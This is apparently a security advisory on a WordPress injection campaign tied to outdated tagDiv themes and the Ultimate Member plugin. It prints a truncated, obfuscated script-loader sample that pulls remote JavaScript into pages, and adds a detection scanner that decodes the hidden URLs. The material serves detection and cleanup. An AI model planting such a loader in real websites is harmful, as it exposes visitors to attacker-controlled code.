Injection of an obfuscated script from hxxps://cdn.allyouwant[.]online/main.js?...
Typical sample:
var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47,...skipped...63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script');
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}
This script can be injected either into JavaScript files (usually with jquery in their names) or into the WordPress database.
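One way to spot this loader in a JavaScript file or an exported database field is to decode each `String.fromCharCode(...)` call and report those that resolve to a URL. This is an added example, not code from the original page; the function names, the constructed sample and the placeholder host `cdn.example.invalid` are assumptions.

```javascript
// Added example (not from the original page). Sample input is constructed;
// cdn.example.invalid is a placeholder host, not an indicator.
const CHARCODE_CALL = /String\.fromCharCode\(([\d\s,]+)\)/g;

// Decode every all-numeric String.fromCharCode(...) call in `source`.
function decodeCharCodeCalls(source) {
  const decoded = [];
  for (const m of source.matchAll(CHARCODE_CALL)) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    if (codes.length === 0 || codes.some(c => !Number.isInteger(c) || c > 0xffff)) continue;
    decoded.push({ index: m.index, text: String.fromCharCode(...codes) });
  }
  return decoded;
}

// Report decoded values that are http(s) URLs. `loaderPattern` is true when the
// same source also creates a script element and appends a node, as the sample does.
function scanSource(source, blocklist = []) {
  const loaderPattern = /createElement\(\s*['"]script['"]\s*\)/.test(source) &&
                        /\.appendChild\(/.test(source);
  const findings = [];
  for (const { index, text } of decodeCharCodeCalls(source)) {
    if (!/^https?:\/\//i.test(text)) continue;
    let host;
    try { host = new URL(text).hostname; } catch { continue; }
    const blocklisted = blocklist.some(d => host === d || host.endsWith('.' + d));
    findings.push({ index, url: text, host, loaderPattern, blocklisted });
  }
  return findings;
}

// Constructed sample shaped like the one above, with the char codes of a placeholder URL.
const toCodes = s => Array.from(s, ch => ch.charCodeAt(0)).join(', ');
const SAMPLE_URL = 'https://cdn.example.invalid/main.js?t=jlc';
const SAMPLE = "var po = document.createElement('script'); po.type = 'text/javascript'; " +
  'po.src = String.fromCharCode(' + toCodes(SAMPLE_URL) + '); ' +
  'document.head.appendChild(po);';
const CLEAN = 'var greeting = String.fromCharCode(72, 105); console.log(greeting);';

console.log(scanSource(SAMPLE, ['example.invalid']));
console.log(scanSource(CLEAN)); // no URL decoded, so no findings
```

A finding with `loaderPattern` set to true and a host the site does not use is worth manual review; pass the domains you track as the `blocklist` argument.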
Affecting:
WordPress.
The attack mainly exploits vulnerabilities in old tagDiv themes and in the unpatched Ultimate Member plugin (older than v2.0.22).
For more information and cleanup instructions, read our blog post.